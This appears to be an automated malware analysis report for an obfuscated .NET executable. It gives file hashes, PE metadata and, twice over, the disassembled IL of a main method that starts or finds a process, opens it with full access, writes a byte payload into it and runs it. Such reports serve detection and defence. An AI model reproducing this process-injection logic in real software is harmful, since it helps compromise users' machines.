Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 6c203fef991986c1325ba64600c1f47e
|
| Sha1 | 5b90d00387bd66213a3ecadc3015ac7b7ff4740b
|
| Sha256 | 2ebbc0ecfdc8da987269085bdff3bfef88b555a5557beec2880d81eb58862fd8
|
| Sha384 | 7985e978aa8a8f8601fd1a5a40615d7dbdf52d769db55ef3736315a1c6220ce2a55fad834c2695d125c883892a9c5326
|
| Sha512 | ee022e7acab6ba70aa8c073008fea044b044cb411e0ec08bdba83646a31903f4bbdff9dae35b417b79576b4243329669e2e52240d3f24a3cd4619c341d6251f9
|
| SSDeep | 3072:u2vDTuTEp3JyJGjqriMtRXGTi7NVan3yEUClBPN2osNPB:rTAEJtoGTixw3ylOFN
|
| TLSH | 10D39BB3FAC7D9E7C544CF3464AB7D25032C82B03D079AE9E9E4213BDD9260589929D3
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | BhVayAL |
| Full Name | BhVayAL |
| EntryPoint | System.Void zEAsONqPEEgAHHfPxytYsQetuXmMIXcGCqTmWVdI::ngTOHfWyBiDRHpgjiKRKUbHzCZoRtkgAUbpTZcRq(System.String[]) |
| Scope Name | BhVayAL |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | WindowsFormsApp1 |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.0 |
| Total Strings | 8 |
| Main Method | System.Void zEAsONqPEEgAHHfPxytYsQetuXmMIXcGCqTmWVdI::ngTOHfWyBiDRHpgjiKRKUbHzCZoRtkgAUbpTZcRq(System.String[]) |
| Main IL Instruction Count | 50 |
| Main IL | call System.Void zEAsONqPEEgAHHfPxytYsQetuXmMIXcGCqTmWVdI::zSKTbuWpBYWnFGamytmIQeerccWFZmkgTBlcrNyh() call System.String <Module>::LMzmJOoFaa() stloc.0 <null> call System.Byte[] zEAsONqPEEgAHHfPxytYsQetuXmMIXcGCqTmWVdI::cZpunTVobduFPjAuNsRYxqpoOQteuXUKUeFQOKei() stloc.1 <null> ldloc.0 <null> call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) call System.Diagnostics.Process System.Linq.Enumerable::FirstOrDefault<System.Diagnostics.Process>(System.Collections.Generic.IEnumerable`1<System.Diagnostics.Process>) stloc.2 <null> ldloc.2 <null> brtrue IL_003E: ldc.i4 2035711 ldloc.0 <null> call System.String <Module>::JETuvkqTZw() call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) stloc.2 <null> ldc.i4 1500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldc.i4 2035711 ldc.i4.0 <null> ldloc.2 <null> callvirt System.Int32 System.Diagnostics.Process::get_Id() call System.IntPtr zEAsONqPEEgAHHfPxytYsQetuXmMIXcGCqTmWVdI::VYfOVCdbDINDNQwaAKaLVvsvsQdrhRQAGLgyxCKv(System.UInt32,System.Boolean,System.Int32) stloc.3 <null> ldloc.3 <null> ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse IL_0065: ldloc.3 leave IL_00A4: ret ldloc.3 <null> ldloc.1 <null> call System.IntPtr zEAsONqPEEgAHHfPxytYsQetuXmMIXcGCqTmWVdI::hIEWSEqKbRpYWAJLKbGwzRTdiJKLDJFdoIRPMswj(System.IntPtr,System.Byte[]) stloc.s V_4 ldloc.s V_4 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse IL_0084: ldloc.3 leave IL_00A4: ret ldloc.3 <null> ldloc.1 <null> ldloc.s V_4 call System.Void zEAsONqPEEgAHHfPxytYsQetuXmMIXcGCqTmWVdI::AJcDIVOuuTfNdHJpOANiUFgrlmKnIUZrFwVPOpvn(System.IntPtr,System.Byte[],System.IntPtr) ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) leave IL_00A4: ret pop <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) leave IL_00A4: ret ret <null> |
| Module Name | BhVayAL |
| Full Name | BhVayAL |
| EntryPoint | System.Void zEAsONqPEEgAHHfPxytYsQetuXmMIXcGCqTmWVdI::ngTOHfWyBiDRHpgjiKRKUbHzCZoRtkgAUbpTZcRq(System.String[]) |
| Scope Name | BhVayAL |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | WindowsFormsApp1 |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.0 |
| Total Strings | 8 |
| Main Method | System.Void zEAsONqPEEgAHHfPxytYsQetuXmMIXcGCqTmWVdI::ngTOHfWyBiDRHpgjiKRKUbHzCZoRtkgAUbpTZcRq(System.String[]) |
| Main IL Instruction Count | 50 |
| Main IL | call System.Void zEAsONqPEEgAHHfPxytYsQetuXmMIXcGCqTmWVdI::zSKTbuWpBYWnFGamytmIQeerccWFZmkgTBlcrNyh() call System.String <Module>::LMzmJOoFaa() stloc.0 <null> call System.Byte[] zEAsONqPEEgAHHfPxytYsQetuXmMIXcGCqTmWVdI::cZpunTVobduFPjAuNsRYxqpoOQteuXUKUeFQOKei() stloc.1 <null> ldloc.0 <null> call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) call System.Diagnostics.Process System.Linq.Enumerable::FirstOrDefault<System.Diagnostics.Process>(System.Collections.Generic.IEnumerable`1<System.Diagnostics.Process>) stloc.2 <null> ldloc.2 <null> brtrue IL_003E: ldc.i4 2035711 ldloc.0 <null> call System.String <Module>::JETuvkqTZw() call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) stloc.2 <null> ldc.i4 1500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldc.i4 2035711 ldc.i4.0 <null> ldloc.2 <null> callvirt System.Int32 System.Diagnostics.Process::get_Id() call System.IntPtr zEAsONqPEEgAHHfPxytYsQetuXmMIXcGCqTmWVdI::VYfOVCdbDINDNQwaAKaLVvsvsQdrhRQAGLgyxCKv(System.UInt32,System.Boolean,System.Int32) stloc.3 <null> ldloc.3 <null> ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse IL_0065: ldloc.3 leave IL_00A4: ret ldloc.3 <null> ldloc.1 <null> call System.IntPtr zEAsONqPEEgAHHfPxytYsQetuXmMIXcGCqTmWVdI::hIEWSEqKbRpYWAJLKbGwzRTdiJKLDJFdoIRPMswj(System.IntPtr,System.Byte[]) stloc.s V_4 ldloc.s V_4 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse IL_0084: ldloc.3 leave IL_00A4: ret ldloc.3 <null> ldloc.1 <null> ldloc.s V_4 call System.Void zEAsONqPEEgAHHfPxytYsQetuXmMIXcGCqTmWVdI::AJcDIVOuuTfNdHJpOANiUFgrlmKnIUZrFwVPOpvn(System.IntPtr,System.Byte[],System.IntPtr) ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) leave IL_00A4: ret pop <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) leave IL_00A4: ret ret <null> |